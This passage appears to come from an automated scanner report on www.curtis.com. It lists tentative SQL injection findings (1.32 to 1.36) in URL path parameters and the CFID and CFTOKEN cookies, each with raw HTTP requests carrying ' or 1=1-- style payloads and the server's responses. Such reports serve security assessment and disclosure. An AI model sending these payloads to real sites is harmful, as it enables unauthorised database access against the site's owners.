<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts23520338'%20or%201%3d2--%20/DateRange/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.32. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15465428'%20or%201%3d1--%20 and 15465428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/DateRange15465428'%20or%201%3d1--%20/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts/DateRange15465428'%20or%201%3d2--%20/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.33. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13057657'%20or%201%3d1--%20 and 13057657'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/DateRange/ipopeng.htm13057657'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts/DateRange/ipopeng.htm13057657'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.34. http://www.curtis.com/scripts/carousel/getimages.cfm [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 17874711%20or%201%3d1--%20 and 17874711%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=617584317874711%20or%201%3d1--%20; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 12:09:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 21-Apr-2010 12:09:11 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=617584317874711%20or%201%3d2--%20; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6215435;path=/
Set-Cookie: CFTOKEN=62237604;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.35. http://www.curtis.com/scripts/carousel/getimages.cfm [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 92379312%20or%201%3d1--%20 and 92379312%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=3257569792379312%20or%201%3d1--%20; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 12:09:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 21-Apr-2010 12:09:19 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=3257569792379312%20or%201%3d2--%20; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6215470;path=/
Set-Cookie: CFTOKEN=50468307;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.36. http://www.curtis.com/scripts/carousel/getimages.cfm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 75027296'%20or%201%3d1--%20 and 75027296'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm75027296'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
